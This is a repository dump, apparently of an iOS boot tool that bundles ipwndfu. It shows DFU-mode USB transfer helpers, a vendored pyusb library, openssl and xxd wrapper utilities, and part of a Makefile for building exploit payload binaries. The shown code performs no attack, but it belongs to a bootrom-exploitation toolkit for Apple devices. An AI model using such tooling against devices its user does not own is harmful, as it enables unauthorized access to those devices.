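    Each chunk goes out as a 0x21 / request 1 control transfer with a
    5000 ms timeout.

    Raises:
        AssertionError: if a transfer reports a different length than the
            chunk that was sent.
    """
    offset = 0
    total = len(data)
    while offset < total:
        chunk = data[offset:offset + MAX_PACKET_SIZE]
        # Keep the transfer out of an assert statement: ``python -O`` strips
        # asserts, which would drop the transfer and never advance the loop
        # correctly.
        sent = device.ctrl_transfer(0x21, 1, 0, 0, chunk, 5000)
        if sent != len(chunk):
            raise AssertionError('short write: sent %r of %d bytes' % (sent, len(chunk)))
        offset += len(chunk)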
56 |
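def get_data(device, amount):
    """Read ``amount`` bytes in chunks of at most MAX_PACKET_SIZE.

    Each chunk is requested with a 0xA1 / request 2 control transfer and a
    5000 ms timeout.

    Returns:
        The received data as ``bytes``.

    Raises:
        AssertionError: if a transfer returns fewer or more bytes than asked.
    """
    chunks = []
    while amount > 0:
        part = min(amount, MAX_PACKET_SIZE)
        ret = device.ctrl_transfer(0xA1, 2, 0, 0, part, 5000)
        if len(ret) != part:
            raise AssertionError('short read: got %d of %d bytes' % (len(ret), part))
        # Under Python 3 the old ``str() + ret.tostring()`` cannot work:
        # tostring() yields bytes (and was removed in 3.9), so collect bytes.
        chunks.append(ret.tobytes())
        amount -= part
    return b''.join(chunks)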
67 |
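def request_image_validation(device):
    """Send an empty 0x21 / request 1 transfer, poll three times, then reset.

    The three polls are 0xA1 / request 3 transfers of length 6 whose results
    are not inspected; the USB port is reset afterwards.

    Raises:
        AssertionError: if the empty transfer does not return 0.
    """
    # Keep the transfer out of an assert statement: ``python -O`` strips
    # asserts, which would silently skip the request itself.
    status = device.ctrl_transfer(0x21, 1, 0, 0, '', 1000)
    if status != 0:
        raise AssertionError('ctrl_transfer(0x21, 1) returned %r, expected 0' % (status,))
    for _ in range(3):
        device.ctrl_transfer(0xA1, 3, 0, 0, 6, 1000)
    usb_reset(device)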
75 |
--------------------------------------------------------------------------------
/resources/ipwndfu/dfu2.py:
--------------------------------------------------------------------------------
1 | import sys, time
2 | import usb # pyusb: use 'pip install pyusb' to install this module
3 | import usb.backend.libusb1
4 | import libusbfinder
5 |
# Largest payload (0x800 = 2048 bytes) moved per control transfer by
# send_data() and get_data().
MAX_PACKET_SIZE = 0x800
7 |
def acquire_device(timeout=5.0, match=None, fatal=True):
    """Find a USB device with idVendor 0x5AC / idProduct 0x1227.

    Args:
        timeout: Seconds to keep polling; at least one scan always runs.
        match: Optional substring that must occur in the serial number.
        fatal: When true, print an error and exit with status 1 if nothing
            is found; otherwise return None.

    Returns:
        The first matching device, or None.
    """
    libusb = usb.backend.libusb1.get_backend(find_library=lambda x: libusbfinder.libusb1_path())
    began = time.time()
    first_pass = True
    # Scan once unconditionally, then repeat until the timeout has elapsed.
    while first_pass or time.time() - began < timeout:
        first_pass = False
        candidates = usb.core.find(find_all=True, idVendor=0x5AC, idProduct=0x1227, backend=libusb)
        for device in candidates:
            if match is None or match in device.serial_number:
                return device
        time.sleep(0.001)
    if not fatal:
        return None
    print 'ERROR: No Apple device in DFU Mode 0x1227 detected after %0.2f second timeout. Exiting.' % timeout
    sys.exit(1)
25 |
def release_device(device):
    """Release the resources pyusb holds for ``device``."""
    usb.util.dispose_resources(device)
29 |
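def reset_counters(device):
    """Send the 0x21 / request 4 control transfer and require a 0 result.

    Raises:
        AssertionError: if the transfer does not return 0.
    """
    # Keep the transfer out of an assert statement: ``python -O`` strips
    # asserts, which would silently skip the request itself.
    status = device.ctrl_transfer(0x21, 4, 0, 0, 0, 1000)
    if status != 0:
        raise AssertionError('ctrl_transfer(0x21, 4) returned %r, expected 0' % (status,))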
33 |
def usb_reset(device):
    """Reset the device's USB port, ignoring a USBError from the reset."""
    try:
        device.reset()
    except usb.core.USBError:
        # Deliberately ignored: per the original author this does not happen
        # on Yosemite but does on El Capitan and Sierra, and the reset
        # should still work.
        return
42 |
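def send_data(device, data):
    """Send ``data`` in chunks of at most MAX_PACKET_SIZE bytes.

    Each chunk goes out as a 0x21 / request 1 control transfer with a
    5000 ms timeout.

    Raises:
        AssertionError: if a transfer reports a different length than the
            chunk that was sent.
    """
    offset = 0
    total = len(data)
    while offset < total:
        chunk = data[offset:offset + MAX_PACKET_SIZE]
        # Keep the transfer out of an assert statement: ``python -O`` strips
        # asserts, which would drop the transfer and never advance the loop
        # correctly.
        sent = device.ctrl_transfer(0x21, 1, 0, 0, chunk, 5000)
        if sent != len(chunk):
            raise AssertionError('short write: sent %r of %d bytes' % (sent, len(chunk)))
        offset += len(chunk)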
50 |
def get_data(device, amount):
    """Read ``amount`` bytes in chunks of at most MAX_PACKET_SIZE.

    Each chunk is requested with a 0xA1 / request 2 control transfer and a
    5000 ms timeout; the pieces are concatenated into one string.
    """
    received = str()
    remaining = amount
    while remaining > 0:
        part = min(remaining, MAX_PACKET_SIZE)
        ret = device.ctrl_transfer(0xA1, 2, 0, 0, part, 5000)
        # A short read is treated as a hard failure.
        assert len(ret) == part
        received += ret.tostring()
        remaining -= part
    return received
61 |
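def request_image_validation(device):
    """Send an empty 0x21 / request 1 transfer, poll three times, then reset.

    The three polls are 0xA1 / request 3 transfers of length 6 whose results
    are not inspected; the USB port is reset afterwards.

    Raises:
        AssertionError: if the empty transfer does not return 0.
    """
    # Keep the transfer out of an assert statement: ``python -O`` strips
    # asserts, which would silently skip the request itself.
    status = device.ctrl_transfer(0x21, 1, 0, 0, '', 1000)
    if status != 0:
        raise AssertionError('ctrl_transfer(0x21, 1) returned %r, expected 0' % (status,))
    for _ in range(3):
        device.ctrl_transfer(0xA1, 3, 0, 0, 6, 1000)
    usb_reset(device)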
69 |
--------------------------------------------------------------------------------
/resources/ipwndfu/libusbfinder/bottles/libusb-1.0.19.mountain_lion.bottle.1.tar.gz:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/MatthewPierson/PyBoot/3502c0919c08b78fc15dd1c5946356831b1c8d10/resources/ipwndfu/libusbfinder/bottles/libusb-1.0.19.mountain_lion.bottle.1.tar.gz
--------------------------------------------------------------------------------
/resources/ipwndfu/libusbfinder/bottles/libusb-1.0.20.mavericks.bottle.1.tar.gz:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/MatthewPierson/PyBoot/3502c0919c08b78fc15dd1c5946356831b1c8d10/resources/ipwndfu/libusbfinder/bottles/libusb-1.0.20.mavericks.bottle.1.tar.gz
--------------------------------------------------------------------------------
/resources/ipwndfu/libusbfinder/bottles/libusb-1.0.21.yosemite.bottle.tar.gz:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/MatthewPierson/PyBoot/3502c0919c08b78fc15dd1c5946356831b1c8d10/resources/ipwndfu/libusbfinder/bottles/libusb-1.0.21.yosemite.bottle.tar.gz
--------------------------------------------------------------------------------
/resources/ipwndfu/libusbfinder/bottles/libusb-1.0.22.el_capitan.bottle.tar.gz:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/MatthewPierson/PyBoot/3502c0919c08b78fc15dd1c5946356831b1c8d10/resources/ipwndfu/libusbfinder/bottles/libusb-1.0.22.el_capitan.bottle.tar.gz
--------------------------------------------------------------------------------
/resources/ipwndfu/libusbfinder/bottles/libusb-1.0.22.high_sierra.bottle.tar.gz:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/MatthewPierson/PyBoot/3502c0919c08b78fc15dd1c5946356831b1c8d10/resources/ipwndfu/libusbfinder/bottles/libusb-1.0.22.high_sierra.bottle.tar.gz
--------------------------------------------------------------------------------
/resources/ipwndfu/libusbfinder/bottles/libusb-1.0.22.mojave.bottle.tar.gz:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/MatthewPierson/PyBoot/3502c0919c08b78fc15dd1c5946356831b1c8d10/resources/ipwndfu/libusbfinder/bottles/libusb-1.0.22.mojave.bottle.tar.gz
--------------------------------------------------------------------------------
/resources/ipwndfu/libusbfinder/bottles/libusb-1.0.22.sierra.bottle.tar.gz:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/MatthewPierson/PyBoot/3502c0919c08b78fc15dd1c5946356831b1c8d10/resources/ipwndfu/libusbfinder/bottles/libusb-1.0.22.sierra.bottle.tar.gz
--------------------------------------------------------------------------------
/resources/ipwndfu/usb/ACKNOWLEDGEMENTS:
--------------------------------------------------------------------------------
1 | Alan Aguiar
2 | jaseg
3 | Johannes Stezenbach
4 | Marijn van Vliet
5 | Stefano Di Martino
6 | Simon Norberg
7 | iThompson
8 | Harry Bock
9 | ponty
10 | Chris Clark
11 | themperek
12 | David Halter
13 | Robert von Burg
14 | James Rowe
15 | Braiden Kindt
16 | Tormod Volden
17 | Chris Clark
18 | Emmanuel Blot
19 | Peter Bigot
20 | Travis Robinson
21 | Xiaofan Chen
22 | Poul-Henning Kamp
23 | Thomas Reitmayr
24 | Carl Ritson
25 | Romain Aviolat
26 | Walker Inman
27 | Prathmesh Prabhu
28 | André Erdmann
29 | Jeffrey Nichols
30 | Deliang Fan
31 | Matthew Chan
32 | Maximilian Köhl
33 |
--------------------------------------------------------------------------------
/resources/ipwndfu/usb/LICENSE:
--------------------------------------------------------------------------------
1 | Copyright (C) 2009-2014 Wander Lairson Costa. All Rights Reserved.
2 |
3 | Redistribution and use in source and binary forms, with or without
4 | modification, are permitted provided that the following conditions
5 | are met:
6 |
7 | 1. Redistributions of source code must retain the above copyright
8 | notice, this list of conditions and the following disclaimer.
9 |
10 | 2. Redistributions in binary form must reproduce the above copyright
11 | notice, this list of conditions and the following disclaimer in the
12 | documentation and/or other materials provided with the distribution.
13 |
14 | 3. The name of the author may not be used to endorse or promote products
15 | derived from this software without specific prior written permission.
16 |
17 | THIS SOFTWARE IS PROVIDED BY THE AUTHOR "AS IS" AND ANY EXPRESS OR IMPLIED
18 | WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF
19 | MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO
20 | EVENT SHALL THE AUTHOR BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
21 | EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT
22 | OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
23 | INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
24 | CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING
25 | IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY
26 | OF SUCH DAMAGE.
27 |
28 |
--------------------------------------------------------------------------------
/resources/ipwndfu/usb/__init__.py:
--------------------------------------------------------------------------------
1 | # Copyright (C) 2009-2014 Wander Lairson Costa
2 | #
3 | # The following terms apply to all files associated
4 | # with the software unless explicitly disclaimed in individual files.
5 | #
6 | # The authors hereby grant permission to use, copy, modify, distribute,
7 | # and license this software and its documentation for any purpose, provided
8 | # that existing copyright notices are retained in all copies and that this
9 | # notice is included verbatim in any distributions. No written agreement,
10 | # license, or royalty fee is required for any of the authorized uses.
11 | # Modifications to this software may be copyrighted by their authors
12 | # and need not follow the licensing terms described here, provided that
13 | # the new terms are clearly indicated on the first page of each file where
14 | # they apply.
15 | #
16 | # IN NO EVENT SHALL THE AUTHORS OR DISTRIBUTORS BE LIABLE TO ANY PARTY
17 | # FOR DIRECT, INDIRECT, SPECIAL, INCIDENTAL, OR CONSEQUENTIAL DAMAGES
18 | # ARISING OUT OF THE USE OF THIS SOFTWARE, ITS DOCUMENTATION, OR ANY
19 | # DERIVATIVES THEREOF, EVEN IF THE AUTHORS HAVE BEEN ADVISED OF THE
20 | # POSSIBILITY OF SUCH DAMAGE.
21 | #
22 | # THE AUTHORS AND DISTRIBUTORS SPECIFICALLY DISCLAIM ANY WARRANTIES,
23 | # INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY,
24 | # FITNESS FOR A PARTICULAR PURPOSE, AND NON-INFRINGEMENT. THIS SOFTWARE
25 | # IS PROVIDED ON AN "AS IS" BASIS, AND THE AUTHORS AND DISTRIBUTORS HAVE
26 | # NO OBLIGATION TO PROVIDE MAINTENANCE, SUPPORT, UPDATES, ENHANCEMENTS, OR
27 | # MODIFICATIONS.
28 |
29 | r"""PyUSB - Easy USB access in Python
30 |
31 | This package exports the following modules and subpackages:
32 |
33 | core - the main USB implementation
34 | legacy - the compatibility layer with 0.x version
35 | backend - the support for backend implementations.
36 | control - USB standard control requests.
37 | libloader - helper module for backend library loading.
38 |
39 | Since version 1.0, main PyUSB implementation lives in the 'usb.core'
40 | module. New applications are encouraged to use it.
41 | """
42 |
43 | import logging
44 | import os
45 |
__author__ = 'Wander Lairson Costa'

# Use Semantic Versioning, http://semver.org/
# version_info is (major, minor, patch); __version__ is derived from it.
version_info = (1, 0, 0)
__version__ = '%d.%d.%d' % version_info

# Names picked up by ``from usb import *``.
__all__ = ['legacy', 'control', 'core', 'backend', 'util', 'libloader']
53 |
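def _setup_log():
    """Configure the 'usb' logger from environment variables.

    PYUSB_DEBUG selects the level ('debug', 'info', 'warning', 'error' or
    'critical'); any other value maps to a level above CRITICAL. When it is
    set, call tracing is enabled and records go to the file named by
    PYUSB_LOG_FILENAME, or to a StreamHandler if that file cannot be opened.
    When PYUSB_DEBUG is unset, a do-nothing handler is installed and the
    level is raised above CRITICAL.
    """
    from usb import _debug
    logger = logging.getLogger('usb')
    debug_level = os.getenv('PYUSB_DEBUG')

    if debug_level is not None:
        _debug.enable_tracing(True)
        filename = os.getenv('PYUSB_LOG_FILENAME')

        LEVELS = {'debug': logging.DEBUG,
                  'info': logging.INFO,
                  'warning': logging.WARNING,
                  'error': logging.ERROR,
                  'critical': logging.CRITICAL}

        level = LEVELS.get(debug_level, logging.CRITICAL + 10)
        logger.setLevel(level = level)

        # NOTE(review): the log path is taken from the environment as-is and
        # opened with the privileges of the current process, and traced calls
        # log the str() of their arguments. Treat both variables as trusted
        # input only, especially when the process runs with elevated rights.
        try:
            handler = logging.FileHandler(filename)
        except Exception:
            # Covers an unset variable (filename is None) and an unwritable
            # path. Narrowed from a bare ``except:`` so KeyboardInterrupt and
            # SystemExit are no longer swallowed here.
            handler = logging.StreamHandler()

        fmt = logging.Formatter('%(asctime)s %(levelname)s:%(name)s:%(message)s')
        handler.setFormatter(fmt)
        logger.addHandler(handler)
    else:
        class NullHandler(logging.Handler):
            def emit(self, record):
                pass

        # We set the log level to avoid delegation to the
        # parent log handler (if there is one).
        # Thanks to Chris Clark for pointing this out.
        logger.setLevel(logging.CRITICAL + 10)

        logger.addHandler(NullHandler())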
91 |
92 |
# Configure the 'usb' logger once, as a side effect of importing the package.
_setup_log()

# We import all 'legacy' module symbols to provide compatibility
# with applications that use 0.x versions.
from usb.legacy import *
98 |
--------------------------------------------------------------------------------
/resources/ipwndfu/usb/_debug.py:
--------------------------------------------------------------------------------
1 | # Copyright (C) 2009-2014 Wander Lairson Costa
2 | #
3 | # The following terms apply to all files associated
4 | # with the software unless explicitly disclaimed in individual files.
5 | #
6 | # The authors hereby grant permission to use, copy, modify, distribute,
7 | # and license this software and its documentation for any purpose, provided
8 | # that existing copyright notices are retained in all copies and that this
9 | # notice is included verbatim in any distributions. No written agreement,
10 | # license, or royalty fee is required for any of the authorized uses.
11 | # Modifications to this software may be copyrighted by their authors
12 | # and need not follow the licensing terms described here, provided that
13 | # the new terms are clearly indicated on the first page of each file where
14 | # they apply.
15 | #
16 | # IN NO EVENT SHALL THE AUTHORS OR DISTRIBUTORS BE LIABLE TO ANY PARTY
17 | # FOR DIRECT, INDIRECT, SPECIAL, INCIDENTAL, OR CONSEQUENTIAL DAMAGES
18 | # ARISING OUT OF THE USE OF THIS SOFTWARE, ITS DOCUMENTATION, OR ANY
19 | # DERIVATIVES THEREOF, EVEN IF THE AUTHORS HAVE BEEN ADVISED OF THE
20 | # POSSIBILITY OF SUCH DAMAGE.
21 | #
22 | # THE AUTHORS AND DISTRIBUTORS SPECIFICALLY DISCLAIM ANY WARRANTIES,
23 | # INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY,
24 | # FITNESS FOR A PARTICULAR PURPOSE, AND NON-INFRINGEMENT. THIS SOFTWARE
25 | # IS PROVIDED ON AN "AS IS" BASIS, AND THE AUTHORS AND DISTRIBUTORS HAVE
26 | # NO OBLIGATION TO PROVIDE MAINTENANCE, SUPPORT, UPDATES, ENHANCEMENTS, OR
27 | # MODIFICATIONS.
28 |
__author__ = 'Wander Lairson Costa'

# Only the two decorators are exported; enable_tracing() is not listed, so a
# star-import does not pick it up.
__all__ = ['methodtrace', 'functiontrace']

import logging
import usb._interop as _interop

# Module-wide switch, off by default. methodtrace/functiontrace read it when
# they decorate a function, not on each call.
_enable_tracing = False
37 |
def enable_tracing(enable):
    """Set the module-wide tracing switch to *enable*.

    The trace decorators in this module consult the switch when they wrap a
    function, so the value only affects functions decorated afterwards.
    """
    global _enable_tracing
    _enable_tracing = enable
41 |
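def _trace_function_call(logger, fname, *args, **named_args):
    """Log one call as ``fname(arg, ..., name=value, ...)`` at DEBUG level.

    Every argument is rendered with ``str()``, so whatever the traced call
    receives (including data buffers) ends up in the log.
    """
    # TODO: check if 'f' is a method or a free function
    # Positional and keyword arguments are joined through a single list so
    # that a separator is also placed between the two groups; the original
    # concatenated two joins and produced e.g. "f(1, 2a=3)".
    rendered = [str(val) for val in args]
    rendered.extend(name + '=' + str(val) for name, val in named_args.items())
    logger.debug(fname + '(' + ', '.join(rendered) + ')')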
49 |
50 | # decorator for methods calls tracing
def methodtrace(logger):
    """Return a decorator that traces method calls through *logger*.

    If tracing is disabled when the decorator is applied, the method is
    returned unchanged. Otherwise calls are logged as ``TypeName.method(...)``,
    with the type name taken from the first positional argument, which is
    then left out of the logged argument list.
    """
    def decorate(f):
        if not _enable_tracing:
            return f

        def traced(*args, **named_args):
            # this check is just an optimization to avoid unnecessary string formatting
            if logger.getEffectiveLevel() <= logging.DEBUG:
                qualified = '%s.%s' % (type(args[0]).__name__, f.__name__)
                _trace_function_call(logger, qualified, *args[1:], **named_args)
            return f(*args, **named_args)

        _interop._update_wrapper(traced, f)
        return traced
    return decorate
64 |
65 | # decorator for function calls tracing
def functiontrace(logger):
    """Return a decorator that traces free-function calls through *logger*.

    If tracing is disabled when the decorator is applied, the function is
    returned unchanged. Otherwise each call is logged under the function's
    own ``__name__`` with all of its arguments.
    """
    def decorate(f):
        if not _enable_tracing:
            return f

        def traced(*args, **named_args):
            # this check is just an optimization to avoid unnecessary string formatting
            if logger.getEffectiveLevel() <= logging.DEBUG:
                _trace_function_call(logger, f.__name__, *args, **named_args)
            return f(*args, **named_args)

        _interop._update_wrapper(traced, f)
        return traced
    return decorate
78 |
--------------------------------------------------------------------------------
/resources/ipwndfu/usb/_interop.py:
--------------------------------------------------------------------------------
1 | # Copyright (C) 2009-2014 Wander Lairson Costa
2 | #
3 | # The following terms apply to all files associated
4 | # with the software unless explicitly disclaimed in individual files.
5 | #
6 | # The authors hereby grant permission to use, copy, modify, distribute,
7 | # and license this software and its documentation for any purpose, provided
8 | # that existing copyright notices are retained in all copies and that this
9 | # notice is included verbatim in any distributions. No written agreement,
10 | # license, or royalty fee is required for any of the authorized uses.
11 | # Modifications to this software may be copyrighted by their authors
12 | # and need not follow the licensing terms described here, provided that
13 | # the new terms are clearly indicated on the first page of each file where
14 | # they apply.
15 | #
16 | # IN NO EVENT SHALL THE AUTHORS OR DISTRIBUTORS BE LIABLE TO ANY PARTY
17 | # FOR DIRECT, INDIRECT, SPECIAL, INCIDENTAL, OR CONSEQUENTIAL DAMAGES
18 | # ARISING OUT OF THE USE OF THIS SOFTWARE, ITS DOCUMENTATION, OR ANY
19 | # DERIVATIVES THEREOF, EVEN IF THE AUTHORS HAVE BEEN ADVISED OF THE
20 | # POSSIBILITY OF SUCH DAMAGE.
21 | #
22 | # THE AUTHORS AND DISTRIBUTORS SPECIFICALLY DISCLAIM ANY WARRANTIES,
23 | # INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY,
24 | # FITNESS FOR A PARTICULAR PURPOSE, AND NON-INFRINGEMENT. THIS SOFTWARE
25 | # IS PROVIDED ON AN "AS IS" BASIS, AND THE AUTHORS AND DISTRIBUTORS HAVE
26 | # NO OBLIGATION TO PROVIDE MAINTENANCE, SUPPORT, UPDATES, ENHANCEMENTS, OR
27 | # MODIFICATIONS.
28 |
29 | # All the hacks necessary to assure compatibility across all
30 | # supported versions come here.
31 | # Please, note that there is one version check for each
32 | # hack we need to do, this makes maintenance easier... ^^
33 |
34 | import sys
35 | import array
36 |
37 | __all__ = ['_reduce', '_set', '_next', '_update_wrapper']
38 |
# we support Python >= 2.4
# NOTE(review): written as an assert, this version check is skipped when
# Python runs with -O.
assert sys.hexversion >= 0x020400f0

# On Python 3, reduce became a functools module function
try:
    import functools
    _reduce = functools.reduce
except (ImportError, AttributeError):
    # No functools.reduce: use the builtin reduce instead.
    _reduce = reduce

# all, introduced in Python 2.5
try:
    _all = all
except NameError:
    # Fallback: fold the iterable with ``and``, starting from True.
    _all = lambda iter_ : _reduce( lambda x, y: x and y, iter_, True )

# we only have the builtin set type since 2.5 version
try:
    _set = set
except NameError:
    # Fallback: the Set class from the ``sets`` module.
    import sets
    _set = sets.Set
61 |
62 | # On Python >= 2.6, we have the builtin next() function
63 | # On Python 2.5 and before, we have to call the iterator method next()
def _next(iter):
    """Return the next item of *iter*.

    Uses the builtin next(); if that raises NameError, falls back to the
    iterator's own ``next()`` method. StopIteration is not caught here.
    """
    try:
        return next(iter)
    except NameError:
        # Also reached if the iterator itself raises NameError while advancing.
        return iter.next()
69 |
# functools appeared in 2.5
try:
    import functools
    _update_wrapper = functools.update_wrapper
except (ImportError, AttributeError):
    # Minimal stand-in: copies the four attributes below from wrapped to
    # wrapper and returns nothing.
    def _update_wrapper(wrapper, wrapped):
        wrapper.__name__ = wrapped.__name__
        wrapper.__module__ = wrapped.__module__
        wrapper.__doc__ = wrapped.__doc__
        # Rebinds wrapper.__dict__ to the very same dict object as wrapped's.
        wrapper.__dict__ = wrapped.__dict__
80 |
81 | # this is used (as of May 2015) twice in core, once in backend/openusb, and in
82 | # some unit test code. It would probably be clearer if written in terms of some
83 | # definite 3.2+ API (bytearrays?) with a fallback provided for 2.4+.
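def as_array(data=None):
    """Return *data* as an ``array.array`` of unsigned bytes (typecode 'B').

    Args:
        data: None (gives an empty array), an existing ``array.array``
            (returned as-is, whatever its typecode), or anything accepted by
            ``array.array('B', data)``. Text that the constructor rejects is
            loaded through the array's byte-loading method instead.

    Returns:
        An ``array.array``; the same object when *data* already is one.
    """
    if data is None:
        return array.array('B')

    if isinstance(data, array.array):
        return data

    try:
        return array.array('B', data)
    except TypeError:
        # When you pass a unicode string or a character sequence,
        # you get a TypeError if the first parameter does not match
        a = array.array('B')
        if hasattr(a, 'frombytes'):
            # Python 3.2+: fromstring() is deprecated and was removed in 3.9,
            # so use frombytes() and encode text explicitly.
            if isinstance(data, str):
                data = data.encode('utf-8')
            a.frombytes(data)
        else:
            # Interpreters without frombytes() keep the original path.
            a.fromstring(data)
        return a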
99 |
--------------------------------------------------------------------------------
/resources/ipwndfu/usb/_lookup.py:
--------------------------------------------------------------------------------
1 | # Copyright (C) 2009-2014 Walker Inman
2 | #
3 | # The following terms apply to all files associated
4 | # with the software unless explicitly disclaimed in individual files.
5 | #
6 | # The authors hereby grant permission to use, copy, modify, distribute,
7 | # and license this software and its documentation for any purpose, provided
8 | # that existing copyright notices are retained in all copies and that this
9 | # notice is included verbatim in any distributions. No written agreement,
10 | # license, or royalty fee is required for any of the authorized uses.
11 | # Modifications to this software may be copyrighted by their authors
12 | # and need not follow the licensing terms described here, provided that
13 | # the new terms are clearly indicated on the first page of each file where
14 | # they apply.
15 | #
16 | # IN NO EVENT SHALL THE AUTHORS OR DISTRIBUTORS BE LIABLE TO ANY PARTY
17 | # FOR DIRECT, INDIRECT, SPECIAL, INCIDENTAL, OR CONSEQUENTIAL DAMAGES
18 | # ARISING OUT OF THE USE OF THIS SOFTWARE, ITS DOCUMENTATION, OR ANY
19 | # DERIVATIVES THEREOF, EVEN IF THE AUTHORS HAVE BEEN ADVISED OF THE
20 | # POSSIBILITY OF SUCH DAMAGE.
21 | #
22 | # THE AUTHORS AND DISTRIBUTORS SPECIFICALLY DISCLAIM ANY WARRANTIES,
23 | # INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY,
24 | # FITNESS FOR A PARTICULAR PURPOSE, AND NON-INFRINGEMENT. THIS SOFTWARE
25 | # IS PROVIDED ON AN "AS IS" BASIS, AND THE AUTHORS AND DISTRIBUTORS HAVE
26 | # NO OBLIGATION TO PROVIDE MAINTENANCE, SUPPORT, UPDATES, ENHANCEMENTS, OR
27 | # MODIFICATIONS.
28 |
29 | r"""usb._lookup - Lookup tables for USB
30 | """
31 |
# Descriptor type code -> human-readable name.
descriptors = {
    0x1 : "Device",
    0x2 : "Configuration",
    0x3 : "String",
    0x4 : "Interface",
    0x5 : "Endpoint",
    0x6 : "Device qualifier",
    0x7 : "Other speed configuration",
    0x8 : "Interface power",
    0x9 : "OTG",
    0xA : "Debug",
    0xB : "Interface association",
    0xC : "Security",
    0xD : "Key",
    0xE : "Encryption type",
    0xF : "Binary device object store (BOS)",
    0x10 : "Device capability",
    0x11 : "Wireless endpoint companion",
    0x30 : "SuperSpeed endpoint companion",
    }

# Device-level class code -> name. Codes missing from the table have no entry,
# so callers need a default when looking one up.
device_classes = {
    0x0 : "Specified at interface",
    0x2 : "Communications Device",
    0x9 : "Hub",
    0xF : "Personal Healthcare Device",
    0xDC : "Diagnostic Device",
    0xE0 : "Wireless Controller",
    0xEF : "Miscellaneous",
    0xFF : "Vendor-specific",
    }

# Interface-level class code -> name.
interface_classes = {
    0x0 : "Reserved",
    0x1 : "Audio",
    0x2 : "CDC Communication",
    0x3 : "Human Interface Device",
    0x5 : "Physical",
    0x6 : "Image",
    0x7 : "Printer",
    0x8 : "Mass Storage",
    0x9 : "Hub",
    0xA : "CDC Data",
    0xB : "Smart Card",
    0xD : "Content Security",
    0xE : "Video",
    0xF : "Personal Healthcare",
    0xDC : "Diagnostic Device",
    0xE0 : "Wireless Controller",
    0xEF : "Miscellaneous",
    0xFE : "Application Specific",
    0xFF : "Vendor Specific",
    }

# Endpoint transfer-type code -> name.
ep_attributes = {
    0x0 : "Control",
    0x1 : "Isochronous",
    0x2 : "Bulk",
    0x3 : "Interrupt",
    }

# Presumably the size, in mA, of one unit of a descriptor's max-power field
# for each bus generation -- confirm against the code that uses them.
MAX_POWER_UNITS_USB2p0 = 2 # mA
MAX_POWER_UNITS_USB_SUPERSPEED = 8 # mA
95 |
--------------------------------------------------------------------------------
/resources/ipwndfu/utilities.py:
--------------------------------------------------------------------------------
1 | import subprocess, sys
2 |
def apply_patches(binary, patches):
    """Return *binary* with every ``(offset, data)`` patch written over it.

    Patches are applied in order and each overwrites ``len(data)`` bytes
    starting at ``offset``. Nothing is bounds-checked: offsets that are
    negative or past the end simply follow Python slice semantics, so the
    result can differ in length from the input.
    """
    patched = binary
    for patch in patches:
        offset, data = patch
        end = offset + len(data)
        patched = patched[:offset] + data + patched[end:]
    return patched
7 |
def aes_decrypt(data, iv, key):
    """Decrypt *data* with AES-CBC by piping it through the ``openssl`` CLI.

    *key* selects the variant by its length: 32 characters give AES-128 and
    64 give AES-256 (presumably hex digits, since it is handed to
    ``openssl enc -K``). Padding is not removed (``-nopad``). Prints an
    error and exits with status 1 on a bad key length, a non-zero openssl
    exit code, or any output on stderr; otherwise returns openssl's stdout.
    """
    bits_by_key_length = {32: 128, 64: 256}
    if len(key) not in bits_by_key_length:
        print 'ERROR: Bad AES key given to aes_decrypt. Exiting.'
        sys.exit(1)
    aes = bits_by_key_length[len(key)]

    # NOTE(review): key and IV travel on the openssl command line, so other
    # local users can read them from the process list while the child runs.
    # Neither value is validated here beyond the key length.
    command = ['openssl', 'enc', '-aes-%s-cbc' % aes, '-d', '-nopad', '-iv', iv, '-K', key]
    pipe = subprocess.PIPE
    p = subprocess.Popen(command, stdout=pipe, stdin=pipe, stderr=pipe)
    (stdout, stderr) = p.communicate(input=data)

    if p.returncode != 0 or stderr:
        print 'ERROR: openssl failed: %s' % stderr
        sys.exit(1)

    return stdout
28 |
def hex_dump(data, address):
    """Return the ``xxd`` hex dump of *data*, run with ``-o str(address)``.

    Prints an error and exits with status 1 if xxd returns a non-zero exit
    code or writes anything to stderr.
    """
    command = ['xxd', '-o', str(address)]
    pipe = subprocess.PIPE
    p = subprocess.Popen(command, stdin=pipe, stdout=pipe, stderr=pipe)
    (stdout, stderr) = p.communicate(input=data)

    if p.returncode != 0 or stderr:
        print 'ERROR: xxd failed: %s' % stderr
        sys.exit(1)

    return stdout
38 |
--------------------------------------------------------------------------------
/resources/ipwndfu8010/.gitignore:
--------------------------------------------------------------------------------
1 | *.pyc
2 | nor-backups/nor-*
3 | libusbfinder/libusb-*
4 | SecureROM-*
5 | n88ap-iBSS-4.3.5.img3
6 | *.ipsw
7 | .DS_Store
8 |
--------------------------------------------------------------------------------
/resources/ipwndfu8010/Makefile:
--------------------------------------------------------------------------------
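# Assembles the sources under src/ into flat binaries under bin/.
# armv6/armv7 use the arm-none-eabi binutils; arm64 uses Xcode's clang via
# xcrun plus gobjcopy (presumably GNU objcopy under its g-prefixed name).
#
# NOTE(review): the repository also ships these bin/*.bin files prebuilt.
# Rebuilding from src/ and comparing the output is the only check available
# here that a shipped blob matches its source.

# None of these targets produce a file of the same name, so declare them
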